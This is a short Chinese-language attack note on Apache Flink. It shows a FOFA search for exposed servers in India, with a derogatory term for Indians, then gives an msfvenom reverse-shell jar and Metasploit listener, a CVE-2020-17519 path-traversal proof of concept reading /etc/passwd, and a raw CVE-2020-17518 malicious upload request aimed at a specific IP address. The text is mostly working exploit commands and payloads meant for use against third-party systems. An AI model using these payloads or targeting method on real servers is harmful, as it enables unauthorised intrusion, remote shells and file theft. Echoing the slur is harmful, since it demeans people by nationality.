fofa搜索Apache Flink
app="APACHE-Flink" &&country="IN"
未授权任意上传jar包导致远程代码执行,找一个阿三的站试试
1:上传生成好的jar包
msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4568 -f jar > main.jar
上传jar包之后监听端口
use exploit/multi/handler
set payload java/shell/reverse_tcp
set lhost ip
set lport 4568
run
2:CVE-2020-17519
任意文件读取,直接访问就行
Poc: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
3:CVE-2020-17518
构造数据包进行发送
POST /jars/upload HTTP/1.1
Host: 159.89.171.110:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 06 Jan 2021 03:23:18 GMT
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
访问http:/ip/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucccess
这里没有成功,可能版本不对
存在漏洞的对应版本:Apache Flink 1.11.0、1.11.1、1.11.2